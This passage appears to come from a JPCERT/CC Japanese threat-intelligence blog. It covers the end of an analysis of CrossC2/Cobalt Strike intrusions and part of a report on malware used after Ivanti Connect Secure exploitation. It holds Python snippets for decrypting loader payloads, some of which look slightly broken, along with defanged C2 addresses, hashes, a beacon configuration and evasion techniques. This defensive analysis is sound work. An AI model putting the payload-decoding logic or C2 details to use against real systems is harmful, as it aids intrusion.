enc_bytes: enc_byte ^= BYTE3(xor_key) & 0xEE ^ BYTE2(xor_key) & 0xEE ^ (xor_key ^ BYTE1(xor_key)) & 0xEE result.append(i) enc_byte += 1 return result def decode01(enc_bytes, xor_key): xor_table = [ 0, 8, 0x10, 0x18] result = [] for enc_byte in enc_bytes: for j in range(4): enc_byte ^= ((xor_key >> xor_table[j]) & 0xEE) result.append(i) return result </pre> ReadNimeLoaderはマルウェア本体の復号方法にAES256-ECBモードを使用します。復号に使用する鍵は前述したデコード関数でデコードされた特定の文字列をつなげて一つの文字列にし、それらを16進数へと変換した後、文字列として大文字へ変換し、ゼロパディングしたものを使用します。次に示すPythonスクリプトで復号することが可能です。 <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> from Crypto.Cipher import AES import binascii def ZeroPadding(hexstr, num): padding_num = num - len(hexstr) if padding_num < 0: return hexstr return hexstr + b"\x00" * padding_num def decrypt(readme_data, key_string): capitalized_key = binascii.hexlify(ascii_to_bytes(key_string)).upper() key = ZeroPadding(capitalized_key, 32) Cipher = AES.new(key, AES.MODE_ECB) return Cipher.decrypt(readme_data) </pre> <h4>OdinLdr</h4> OdinLdrは実行後に内部にエンコードされたCobalt Strike Beaconを復号し、メモリ上で動作しますが、一定周期でランダムに生成されるXOR鍵をもとに新しく確保したヒープメモリ上に暗号化される仕組みであり、メモリのスキャンなどを回避することを狙って使用されたものと思われます。ヒープメモリの先頭アドレスに"OdinLdr1337"という文字列がある点が特徴としてあげられます。なお、ReadNimeLoaderが展開するShellcodeにはOdinLdrを介してCobalt Strike Beaconを実行するものと直接Cobalt Strike Beaconを実行するサンプルも確認されています。 Appendix BにReadNimeLoaderのバージョンとマルウェア本体をデコードする際に使用する鍵、ロードするreadme.txt、エンコードされるマルウェア本体の対応関係を記載します。なお、使用されたCobalt Strikeのコンフィグの一部をAppendixに記載しています。 <h3>攻撃者が使用するツール</h3> 攻撃者によって使用されたツールとして、複数のELF版のSystemBCが使用されていました。Windows版SystemBCとの差分などの情報はanyrunによる報告<a href="#3">[3]</a>をご覧ください。その他使用されたツールとして、横展開に使用されることが多いPsExec、AS-REP Roasting攻撃に使用されるGetNPUsers<a href="#4">[4]</a>、SSHクライアントツールのPlink、Windowsにおける権限昇格ツールなどが確認されています。 <h3>帰属</h3> 確認したCobalt StrikeのC2に使用されたドメインがRapid7によって公開されているBlackBastaの記事<a href="#5">[5]</a>のC2と同一である点、ReadNimeLoaderに使用されるjli.dllとreadme.txtというファイル名の各ファイルが使用された点、動作するアーキテクチャは異なるもののSystemBCを使用する点やADへの攻撃にAS-REPを使用する点も一致していることから、本攻撃者および攻撃キャンペーンはBlackBastaと何らかの関係がある可能性が考えられます。 <h3>CrossC2の分析ツール</h3> CrossC2用分析ツールとして、コンフィグパーサーをGitHub上で公開していますので、ご活用ください。 GitHub：JPCERTCC/aa-tools/parse_crossc2beacon_config.py <a href="https://github.com/JPCERTCC/aa-tools/blob/master/parse_crossc2beacon_config.py" target="_blank">https://github.com/JPCERTCC/aa-tools/blob/master/parse_crossc2beacon_config.py</a> なお、CrossC2はLinuxだけでなく、macOS向けのバイナリを生成することもできますが、本コンフィグパーサーはmacOS向けバイナリにも対応しています。図5にコンフィグパーサーの実行結果の例を示します。 <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/LinuxCS05-800wri.png" width="800" height="689" alt="" class="asset asset-image at-xid-3824889 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/> <div style="text-align: center;"> 図5：コンフィグパーサーの動作例 </div> <h3>おわりに</h3> Cobalt Strikeを使ったインシデントは数多く存在しますが、Cobalt Strike Beaconの機能をクロスプラットフォームへと拡張するツールCrossC2が攻撃に利用され、内部ネットワークにあるLinuxサーバーが侵害される事例を今回確認しました。LinuxサーバーにはEDRなどが導入されていない場合も多く、侵害範囲を拡大する起点になり得るため、注意が必要です。今回解説した情報をインシデント対応や分析などにご活用いただければ幸いです。確認したマルウェアの通信先やハッシュ値については、Appendixに記載していますのでそれぞれご確認ください。 インシデントレスポンスグループ増渕維摩 <h4>参考情報</h4> <a name="1"></a>[1] CrossC2 <a href="https://github.com/gloxec/CrossC2" target="_blank"> https://github.com/gloxec/CrossC2</a> <a name="2"></a>[2] OdinLdr <a href="https://github.com/emdnaia/OdinLdr" target="_blank"> https://github.com/emdnaia/OdinLdr</a> <a name="3"></a>[3] ANY.RUN A new SystemBC RAT is targeting Linux-based platforms <a href="https://x.com/anyrun_app/status/1884207667058463188" target="_blank"> https://x.com/anyrun_app/status/1884207667058463188</a> <a name="4"></a>[4] GetNPUsers.py <a href="https://github.com/fortra/impacket/blob/master/examples/GetNPUsers.py" target="_blank"> https://github.com/fortra/impacket/blob/master/examples/GetNPUsers.py</a> <a name="5"></a>[5] Rapid7 BlackSuit Continues Social Engineering Attacks in Wake of Black Basta’s Internal Conflict <a href="https://www.rapid7.com/blog/post/2025/06/10/blacksuit-continues-social-engineering-attacks-in-wake-of-black-bastas-internal-conflict/" target="_blank"> https://www.rapid7.com/blog/post/2025/06/10/blacksuit-continues-social-engineering-attacks-in-wake-of-black-bastas-internal-conflict/</a> <h4>Appendix A：CrossC2のコンフィグの例</h4> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> C2: 162.33.179[.]247:8443 PUBLICKEY: -----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCaW 34Iv7znqVuomjiJn4Yr1ck9YSWylfAoiy20DnR0ab CoHtdPK3L05CgOjnLGSfM5Vji0IRd8xtCGpU699Jt FCa/Jg7zmuejilkKTFpMB36+49UQtaYp4KjFuImRC z72NdzszsLzHDlVWAPmn5CSTfsTIzceomQfmCDY// IygzQIDAQAB -----END PUBLIC KEY----- </pre> <h4>Appendix B：ReadNimeLoaderとマルウェア本体との対応関係</h4> 表1 ReadNimeLoaderとマルウェア本体との対応関係 <table style="table-layout: fixed; width: 100%;"> <colgroup> <col style="width: 24%;"> <col style="width: 9%;"> <col style="width: 30%;"> <col style="width: 24%;"> <col style="width: 13%;"> </colgroup> <thead> <tr> <th>ReadNimeLoader Hash(SHA256)</th> <th>Version</th> <th>Key</th> <th>readme.txt Hash(SHA256)</th> <th>Encoded Malware</th> </tr> </thead> <tbody> <tr> <td style="word-wrap: break-word; white-space: normal;">56b941f6dcb769ae6d6995412559012abab830f05d5d8acf2648f7fa48c20833</td> <td style="word-wrap: break-word; white-space: normal;">New</td> <td style="word-wrap: break-word; white-space: normal;">toupper(to_hex("mfzuyqroasv")) + zero padding</td> <td style="word-wrap: break-word; white-space: normal;">6246fb5c8b714707ac49ade53e6fe5017d96442db393b1c0ba964698ae24245d</td> <td style="word-wrap: break-word; white-space: normal;">OdinLdr + CobaltStrike</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">dfe79b9c57cfb9fc10597b43af1c0a798991b6ceeec2af9b1e0ed46e6a8661c8</td> <td style="word-wrap: break-word; white-space: normal;">New</td> <td style="word-wrap: break-word; white-space: normal;">toupper(to_hex("vbewtdsmmswfweoz"))</td> <td style="word-wrap: break-word; white-space: normal;">acdf2a87ed03f2c6fe1d9899e8a74e8b56f7b77bb8aed5adf2cc374ee5465168</td> <td style="word-wrap: break-word; white-space: normal;">OdinLdr + CobaltStrike</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">3f96b6589996e57abc1c4d9b732528d2d11dea5c814f8241170c14ca2cd0281d</td> <td style="word-wrap: break-word; white-space: normal;">New</td> <td style="word-wrap: break-word; white-space: normal;">toupper(to_hex("lgehaoevolq")) + zero padding</td> <td style="word-wrap: break-word; white-space: normal;">6b80d602472c76b1d0f05bcce62e0a34de758232d9d570ba61b540784c663c01</td> <td style="word-wrap: break-word; white-space: normal;">CobaltStrike</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">0ab709728666f8759ad8db574d4009cf74ebce36ef2572ef52b058997a9b2a25</td> <td style="word-wrap: break-word; white-space: normal;">New</td> <td style="word-wrap: break-word; white-space: normal;">toupper(to_hex("ffjazoinsmsiywwt"))</td> <td style="word-wrap: break-word; white-space: normal;">3079a29575a0adff91f04c5493a7f3e1c89795e3a90cf842650cd8bd45c4e1bc</td> <td style="word-wrap: break-word; white-space: normal;">CobaltStrike</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ecca3194613b0bab02059c3544fdc90f6d4af5a4c06518c853517eb1d81b9735</td> <td style="word-wrap: break-word; white-space: normal;">Old</td> <td style="word-wrap: break-word; white-space: normal;">toupper(to_hex("bcstctskmngpjjax"))</td> <td style="word-wrap: break-word; white-space: normal;">Unknown</td> <td style="word-wrap: break-word; white-space: normal;">Unknown</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ad90a4490d82c7bd300fdbbdca0336e5ad2219d63ea0f08cebc33050d65b7ef2</td> <td style="word-wrap: break-word; white-space: normal;">Old</td> <td style="word-wrap: break-word; white-space: normal;">toupper(to_hex("lklzndaawijhd")) + zero padding</td> <td style="word-wrap: break-word; white-space: normal;">70b3b8e07752c1f3d4a462b2ab47ca3d9fb5094131971067230031b8b2cd84f2</td> <td style="word-wrap: break-word; white-space: normal;">CobaltStrike</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">99d6b73b1a9e66d7f6dcb3244ea0783b60776efd223d95c4f95e31fde434e258</td> <td style="word-wrap: break-word; white-space: normal;">Old</td> <td style="word-wrap: break-word; white-space: normal;">toupper(to_hex("ifovxtgokm|yzjwz"))</td> <td style="word-wrap: break-word; white-space: normal;">Unknown</td> <td style="word-wrap: break-word; white-space: normal;">Unknown</td> </tr> </tbody> </table> <h4>Appendix C：Cobalt Strikeのコンフィグの例</h4> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> BeaconType - HTTPS Port - 443 SleepTime - 30000 MaxGetSize - 2097328 Jitter - 40 MaxDNS - Not Found PublicKey_MD5 - d67a7903c6777d64b69845b6fcd5db65 C2Server - 64.95.10[.]209,/Collector/2.0/settings/,179.60.149[.]209,/Collector/2.0/settings/,64.52.80[.]62,/Collector/2.0/settings/ UserAgent - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Teams/1.4.00.2879 Chrome/80.0.3987.165 Electron/8.5.1 Safari/537.36 HttpPostUri - /MkuiIJzM2IZs Malleable_C2_Instructions - Remove 46 bytes from the end Remove 130 bytes from the beginning NetBIOS decode 'a' HttpGet_Metadata - ConstHeaders Accept: json Host: westeurope-teams.azureedge.net Referer: https://teams.microsoft.com/_ x-ms-session-id: f73c3186-057a-d996-3b63-b6e5de6ef20c x-ms-client-type: desktop x-mx-client-version: 27/1.0.0.2021020410 Accept-Encoding: gzip, deflate, br Origin: https://teams.microsoft.com ConstParams qsp=true client-id=NO_AUTH sdk-version=ACT-Web-JS-2.5.0& Metadata base64url parameter "events" HttpPost_Metadata - ConstHeaders Connection: Keep-Alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 SessionId base64url parameter "id" Output base64url print PipeName - Not Found DNS_Idle - Not Found DNS_Sleep - Not Found SSH_Host - Not Found SSH_Port - Not Found SSH_Username - Not Found SSH_Password_Plaintext - Not Found SSH_Password_Pubkey - Not Found SSH_Banner - HttpGet_Verb - GET HttpPost_Verb - POST HttpPostChunk - 0 Spawnto_x86 - %windir%\syswow64\powercfg.exe Spawnto_x64 - %windir%\sysnative\powercfg.exe CryptoScheme - 0 Proxy_Config - Not Found Proxy_User - Not Found Proxy_Password - Not Found Proxy_Behavior - Use IE settings Watermark_Hash - NtZOV6JzDr9QkEnX6bobPg== Watermark - 987654321 bStageCleanup - True bCFGCaution - True KillDate - 0 bProcInject_StartRWX - True bProcInject_UseRWX - False bProcInject_MinAllocSize - 8096 ProcInject_PrependAppend_x86 - Empty ProcInject_PrependAppend_x64 - Empty ProcInject_Execute - ntdll.dll:RtlUserThreadStart NtQueueApcThread-s SetThreadContext CreateRemoteThread kernel32.dll:LoadLibraryA RtlCreateUserThread ProcInject_AllocationMethod - VirtualAllocEx bUsesCookies - False HostHeader - headersToRemove - Not Found DNS_Beaconing - Not Found DNS_get_TypeA - Not Found DNS_get_TypeAAAA - Not Found DNS_get_TypeTXT - Not Found DNS_put_metadata - Not Found DNS_put_output - Not Found DNS_resolver - Not Found DNS_strategy - round-robin DNS_strategy_rotate_seconds - -1 DNS_strategy_fail_x - -1 DNS_strategy_fail_seconds - -1 Retry_Max_Attempts - 0 Retry_Increase_Attempts - 0 Retry_Duration - 0 </pre> <h4>Appendix D：Network</h4> <ul> <li>64.52.80[.]62:443</li> <li>64.95.10[.]209:443</li> <li>67.217.228[.]55:443</li> <li>137.184.155[.]92:443</li> <li>159.65.241[.]37:443</li> <li>162.33.179[.]247:8443</li> <li>165.227.113[.]183:443</li> <li>179.60.149[.]209:443</li> <li>192.241.190[.]181:443</li> <li>api.glazeceramics[.]com:443</li> <li>doc.docu-duplicator[.]com:53</li> <li>doc2.docu-duplicator[.]com:53</li> <li>comdoc1.docu-duplicator[.]com:53</li> </ul> <h4>Appendix E：マルウェア</h4> 表2 マルウェア・ツール一覧 <table style="table-layout: fixed; width: 100%;"> <colgroup> <col style="width: 15%;"> <col style="width: 15%;"> <col style="width: 70%;"> </colgroup> <thead> <tr> <th>Malware</th> <th>Filename</th> <th>Hash(SHA256)</th> </tr> </thead> <tbody> <tr> <td style="word-wrap: break-word; white-space: normal;">java(Legitimate)</td> <td style="word-wrap: break-word; white-space: normal;">java.exe</td> <td style="word-wrap: break-word; white-space: normal;">16b1819186f0803b9408d9a448a176142f8271a4bc0b42cdb78eb4489bce16fe</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ReadNimeLoader</td> <td style="word-wrap: break-word; white-space: normal;">jli.dll</td> <td style="word-wrap: break-word; white-space: normal;">56b941f6dcb769ae6d6995412559012abab830f05d5d8acf2648f7fa48c20833</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ReadNimeLoader</td> <td style="word-wrap: break-word; white-space: normal;">jli.dll</td> <td style="word-wrap: break-word; white-space: normal;">dfe79b9c57cfb9fc10597b43af1c0a798991b6ceeec2af9b1e0ed46e6a8661c8</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ReadNimeLoader</td> <td style="word-wrap: break-word; white-space: normal;">jli.dll</td> <td style="word-wrap: break-word; white-space: normal;">3f96b6589996e57abc1c4d9b732528d2d11dea5c814f8241170c14ca2cd0281d</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ReadNimeLoader</td> <td style="word-wrap: break-word; white-space: normal;">jli.dll</td> <td style="word-wrap: break-word; white-space: normal;">0ab709728666f8759ad8db574d4009cf74ebce36ef2572ef52b058997a9b2a25</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ReadNimeLoader</td> <td style="word-wrap: break-word; white-space: normal;">jli.dll</td> <td style="word-wrap: break-word; white-space: normal;">ecca3194613b0bab02059c3544fdc90f6d4af5a4c06518c853517eb1d81b9735</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ReadNimeLoader</td> <td style="word-wrap: break-word; white-space: normal;">jli.dll</td> <td style="word-wrap: break-word; white-space: normal;">ad90a4490d82c7bd300fdbbdca0336e5ad2219d63ea0f08cebc33050d65b7ef2</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ReadNimeLoader</td> <td style="word-wrap: break-word; white-space: normal;">jli.dll</td> <td style="word-wrap: break-word; white-space: normal;">99d6b73b1a9e66d7f6dcb3244ea0783b60776efd223d95c4f95e31fde434e258</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Cobalt Strike</td> <td style="word-wrap: break-word; white-space: normal;">readme.txt</td> <td style="word-wrap: break-word; white-space: normal;">6246fb5c8b714707ac49ade53e6fe5017d96442db393b1c0ba964698ae24245d</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Cobalt Strike</td> <td style="word-wrap: break-word; white-space: normal;">readme.txt</td> <td style="word-wrap: break-word; white-space: normal;">acdf2a87ed03f2c6fe1d9899e8a74e8b56f7b77bb8aed5adf2cc374ee5465168</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Cobalt Strike</td> <td style="word-wrap: break-word; white-space: normal;">readme.txt</td> <td style="word-wrap: break-word; white-space: normal;">6b80d602472c76b1d0f05bcce62e0a34de758232d9d570ba61b540784c663c01</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Cobalt Strike</td> <td style="word-wrap: break-word; white-space: normal;">readme.txt</td> <td style="word-wrap: break-word; white-space: normal;">3079a29575a0adff91f04c5493a7f3e1c89795e3a90cf842650cd8bd45c4e1bc</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Cobalt Strike</td> <td style="word-wrap: break-word; white-space: normal;">readme.txt</td> <td style="word-wrap: break-word; white-space: normal;">70b3b8e07752c1f3d4a462b2ab47ca3d9fb5094131971067230031b8b2cd84f2</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">CrossC2</td> <td style="word-wrap: break-word; white-space: normal;">gds</td> <td style="word-wrap: break-word; white-space: normal;">28d668f3e1026a56d55bc5d6e36fad71622c1ab20ace52d3ab12738f9f8c6589</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">CrossC2</td> <td style="word-wrap: break-word; white-space: normal;">gss</td> <td style="word-wrap: break-word; white-space: normal;">9e8c550545aea5212c687e15399344df8a2c89f8359b90d8054f233a757346e7</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ELF-SystemBC</td> <td style="word-wrap: break-word; white-space: normal;">monitor</td> <td style="word-wrap: break-word; white-space: normal;">74a33138ce1e57564baa4ea4db4a882d6bf51081b79a167a6cb2bf9130ddad7f</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">ELF-SystemBC</td> <td style="word-wrap: break-word; white-space: normal;">monitor</td> <td style="word-wrap: break-word; white-space: normal;">7ccff87db7b4e6bc8c5a7e570f83e26ccb6f3a8f72388210af466048d3793b00</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">GetNPUsers</td> <td style="word-wrap: break-word; white-space: normal;">GetNPUsers_windows.exe</td> <td style="word-wrap: break-word; white-space: normal;">e0e827198a70eef6c697559660106cfab7229483b0cd7f0c7abd384a3d2ee504</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Tools related to privilege escalation</td> <td style="word-wrap: break-word; white-space: normal;">wermgr.exe</td> <td style="word-wrap: break-word; white-space: normal;">f79e047ae4834e6a9234ca1635f18b074a870b366fe4368c10c2ddc56dfbb1bc</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Tools related to privilege escalation</td> <td style="word-wrap: break-word; white-space: normal;">wermgr.exe</td> <td style="word-wrap: break-word; white-space: normal;">ac02aee660d44a8bfbc69e9c46cf402fd41e99915e13d0de3977e662ef13b2ca</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Plink v0.81</td> <td style="word-wrap: break-word; white-space: normal;">conhost.exe</td> <td style="word-wrap: break-word; white-space: normal;">2e338a447b4ceaa00b99d742194d174243ca82830a03149028f9713d71fe9aab</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">PsExec v2.43</td> <td style="word-wrap: break-word; white-space: normal;">PsExec.exe</td> <td style="word-wrap: break-word; white-space: normal;">078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">cab関連ツール</td> <td style="word-wrap: break-word; white-space: normal;">hhupd.exe</td> <td style="word-wrap: break-word; white-space: normal;">d74eac55eeaa3138bc1e723c56013bb1af7709f0a77308bfbf268d4e32b37243</td> </tr> </tbody> </table>
Ivanti Connect Secureの脆弱性を起点とした侵害で確認されたマルウェア

Fri, 18 Jul 2025 02:00:00 -0000

以前のJPCERT/CC Eyesで、Ivanti Connect Secure...

以前のJPCERT/CC Eyesで、Ivanti Connect Secureの脆弱性を利用して設置された<a href="https://blogs.jpcert.or.jp/ja/2025/02/spawnchimera.html" target="_blank">マルウェアSPAWNCHIMERA</a>や<a href="https://blogs.jpcert.or.jp/ja/2025/04/dslogdrat.html" target="_blank">DslogdRAT</a>について紹介しましたが、JPCERT/CCでは、現在まで継続してIvanti Connect Secureの脆弱性を悪用する攻撃活動を確認しています。今回は、2024年12月から2025年7月現在までCVE-2025-0282やCVE-2025-22457を悪用する攻撃者が使用した以下のマルウェア、ツール、攻撃者が組織内ネットワークに侵入した際に使用する攻撃手法について解説します。 <ul> <li>MDifyLoaderとCobalt Strike Beacon</li> <li>vshell</li> <li>Fscan</li> </ul> <h3>MDifyLoaderとCobalt Strike Beacon</h3> Cobalt Strikeの実行までの流れを図1に示します。初めに設定されたタスクなどから正規ファイルが動作し、ローダー（以下、MDifyLoaderという。）がDLLサイドローディングによって実行されます。MDifyLoaderは暗号化されたデータファイルを読み込み、Cobalt Strike Beaconをデコード後、メモリ上で実行します。 <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/ivanti_cs01-800wri.png" width="800" height="309" alt="" class="asset asset-image at-xid-3805232 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/> <div style="text-align: center;"> 図1：MDifyLoaderによるCobalt Strikeの実行までの流れ </div> MDifyLoaderはオープンソースのlibPeConv<a href="#1">[1]</a>をもとに作成されたローダーです。データファイルの復号においてはRC4が使用され、RC4の鍵は実行ファイルのMD5ハッシュ値を使用します。この方法により実行ファイル、ローダー、データファイルの3つがそろっていないと動作しないため、分析を妨害する目的などが考えられます。なお、使用された正規ファイルにはJava RMI コンパイラのrmic.exeやpush_detect.exeなどが使用された事例を確認しています。 MDifyLoaderの各関数内においては、図2に示すようなジャンクコードが無数に挿入されていました。ジャンクコードは意味のほとんどない関数の呼び出しや変数の参照を組み合わせて挿入されており、相対アドレスの値がコード内に含まれる点や関数の返り値の値を参照するため、ジャンクコードを機械的に判別することが難しく、難読化解除を妨害する工夫が見受けられました。 <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/ivanti_cs02-800wri.png" width="800" height="372" alt="" class="asset asset-image at-xid-3805233 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/> <div style="text-align: center;"> 図2：MDifyLoaderにおける難読化 </div> 通常、Cobalt Strike Beaconはコンフィグデータを検体内部に持っており、1バイトのXOR鍵を使用して実行時にデコードされ参照されますが、攻撃者が使用するCobalt Strike Beaconではコンフィグデータのデコード方式にRC4が使用され、そのRC4鍵は"google"としてBeacon内にハードコードされていました。その追加されたRC4のコードを図3に示します。また、設定されているコンフィグの要素数からCobalt StrikeのVersion 4.5であることを確認しています。なお、BeaconのNameフィールドにNewBeacon.dllと記載があり、攻撃者によって付けられた本Beaconの名称と考えられます。 <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/ivanti_cs03-800wri.png" width="800" height="819" alt="" class="asset asset-image at-xid-3805234 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/> <div style="text-align: center;"> 図3：Cobalt Strike Beaconへ追加されたRC4関数 </div> <h3>vshellの使用</h3> vshellはGitHubで公開されていたGo言語で書かれたマルチプラットフォーム環境で動作するRATです（本ブログ執筆時点では、対象のGitHubレポジトリは公開されていません）。攻撃者は、Windows実行ファイルのvshell version 4.6.0を使用する事例を確認しています。使用されたvshellの特徴として実行時に中国語環境かどうかをチェックする機能が含まれており、そのコードの一部を図4に示します。攻撃者はvshellの実行に何度も失敗しており、そのたびに新しいvshellを設置、実行を試みた痕跡が確認されました。原因としては、内部テスト用に使用していた言語確認機能をそのまま使ってしまった可能性が考えられます。 <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/ivanti_cs04-800wri.png" width="800" height="1389" alt="" class="asset asset-image at-xid-3805235 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/> <div style="text-align: center;"> 図4：中国語環境かをチェックしているvshellのコードの一部 </div> <h3>Fscan</h3> Fscan<a href="#2">[2]</a>はオープンソースのGo言語で書かれたネットワークスキャンツールです。攻撃者はローダーを介してFscanを実行します。Fscan実行までの流れを図5に示します。Fscanの実行には正規のpython.exeが悪用されています。DLLサイドローディングで悪意のあるpython311.dllをロードさせ、エンコードされたFscanであるk.binを読み込み、デコード後、メモリ上で実行されます。なお、python311.dllはオープンソースのFilelessRemotePE<a href="#3">[3]</a>をもとに作成されており、Fscan本体の復号には内部にハードコードされている"99999999"を鍵としてRC4を使用し、デコードします。 <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/ivanti_cs05-800wri.png" width="800" height="409" alt="" class="asset asset-image at-xid-3805236 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/> <div style="text-align: center;"> 図5：Fscanの実行までの流れ </div> <h3>組織内ネットワークに侵入後の攻撃活動</h3> 以降では組織内ネットワークに侵入した攻撃者が使用した横展開方法や永続化、防衛回避手法などについて解説します。 <h4>横展開（Lateral Movement）</h4> 攻撃者は内部ネットワークへの侵入後、ADサーバーに対してブルートフォース攻撃などを行い認証情報の取得を試みます。また、内部ネットワークに対しネットワークスキャンを行いFTPサーバーやMSSQLサーバー、SSHサーバーに対してもブルートフォース攻撃を行います。さらに、SMBの脆弱性であるMS17-010を悪用して、脆弱性が未修整のホストに侵入します。これらの活動により取得した資格情報などを用いてRDPやSMBを経由して他のシステムへ横展開し、マルウェアを設置します。 <h4>永続化（Persistence）</h4> 攻撃者は新たなドメインアカウントを作成し、これを既存の各グループに登録することで取得していた認証情報が失効した場合でも再侵入することが可能なアカウントを確保しました。このようなアカウントは、通常の運用と見分けがつきにくく、長期間にわたり内部ネットワークへのアクセスを維持することが可能となります。加えて、マルウェアの永続化方法として、攻撃者はマルウェアをサービスやタスクスケジューラとして登録することで、システム起動時や特定のイベントトリガーにおいてマルウェアが実行されるよう設定しました。 <h4>防衛回避（Defense Evasion）</h4> Windows環境において使用されるマルウェアは正規ファイルを使ったローダーを介して実行することでセキュリティ製品による検知や監視の回避を狙っていると考えられます。なお、FilelessRemotePEをもとに作成されているFscanのローダーには、FilelessRemotePEの機能であるNtdll.dllへのETW Bypass機能があるため、EDRなどの検知回避を狙っていると考えられます。 <h2>おわりに</h2> これらの攻撃は2024年12月から現在まで続いており、Ivanti Connect SecureなどのVPN機器を狙った攻撃は今後も継続して行われることが予想されます。なお、Appendixにマルウェアのハッシュ値、通信先、Cobalt Strikeのコンフィグ、vshellのコンフィグなどをそれぞれ記載していますのでご確認ください。 インシデントレスポンスグループ増渕維摩、喜野孝太、亀井智矢 <h4>参考情報</h4> <a name="1"></a>[1] libPeConv <a href="https://github.com/hasherezade/libpeconv" target="_blank"> https://github.com/hasherezade/libpeconv</a> <a name="2"></a>[2] Fscan <a href="https://github.com/shadow1ng/Fscan" target="_blank"> https://github.com/shadow1ng/Fscan</a> <a name="3"></a>[3] FilelessRemotePE <a href="https://github.com/ASkyeye/FilelessRemotePE" target="_blank"> https://github.com/ASkyeye/FilelessRemotePE</a> <h4>Appendix A：MITRE ATT&CK</h4> 表1: 攻撃活動におけるATT&CKマッピング <table> <thead> <tr> <th>戦術(Tactic)</th> <th>テクニックID</th> <th>テクニック名</th> <th>内容</th> </tr> </thead> <tbody> <tr> <td>Initial Access</td> <td>T1133</td> <td>External Remote Services</td> <td>VPN機器の脆弱性を悪用して侵入</td> </tr> <tr> <td>Execution</td> <td>T1053.005</td> <td>Scheduled Task/Job: Scheduled Task</td> <td>スケジュールタスク経由でマルウェアを実行</td> </tr> <tr> <td></td> <td>T1136.002</td> <td>Create Account: Domain Account</td> <td>永続化のために新たなドメインアカウントを作成</td> </tr> <tr> <td></td> <td>T1098</td> <td>Account Manipulation</td> <td>作成したアカウントを各グループに追加し、持続的なアクセスを確保</td> </tr> <tr> <td></td> <td>T1543.003</td> <td>Create or Modify System Process: Windows Service</td> <td>マルウェアをWindowsサービスとして登録し、自動実行の設定</td> </tr> <tr> <td></td> <td>T1053.005</td> <td>Scheduled Task</td> <td>タスクスケジューラを用いてマルウェアを定期的またはトリガー条件で再実行させる</td> </tr> <tr> <td>Privilege Escalation</td> <td>T1543.003</td> <td>Create or Modify System Process: Windows Service</td> <td>マルウェアをWindowsサービスとして登録し、自動実行の設定</td> </tr> <tr> <td>Defense Evasion</td> <td>T1036</td> <td>Masquerading</td> <td>マルウェアを正規のファイルや名称に偽装し、異常な挙動を隠蔽</td> </tr> <tr> <td></td> <td>T1070.004</td> <td>File Deletion</td> <td>攻撃の痕跡を隠すために、使用したマルウェアやツールを削除</td> </tr> <tr> <td></td> <td>T1140</td> <td>Deobfuscate/Decode Files or Information</td> <td>各ローダーによる難読化や復号テクニックの使用</td> </tr> <tr> <td></td> <td>T1562.001</td> <td>Impair Defenses: Disable or Modify Tools</td> <td>Fscanのローダーによるntdll.dllへのパッチによるETWの無効化</td> </tr> <tr> <td>Credential Access</td> <td>T1110.001</td> <td>Password Guessing</td> <td>ADサーバーやFTP、MSSQL、SSHに対してブルートフォース攻撃を実施し、認証情報を取得</td> </tr> <tr> <td>Discovery</td> <td>T1087</td> <td>Account Discovery</td> <td>アカウント情報を収集</td> </tr> <tr> <td>Lateral Movement</td> <td>T1210</td> <td>Exploitation for Lateral Movement</td> <td>SMBのMS17-010脆弱性を悪用して、他のホストに横展開を実施</td> </tr> <tr> <td></td> <td>T1021.001</td> <td>Remote Services: Remote Desktop Protocol</td> <td>取得した資格情報を用いてRDP経由で他ホストへ横展開</td> </tr> <tr> <td></td> <td>T1021.002</td> <td>Remote Services: SMB/Windows Admin Shares</td> <td>SMB共有を通じて侵害を拡大</td> </tr> <tr> <td>Command and Control</td> <td>T1573</td> 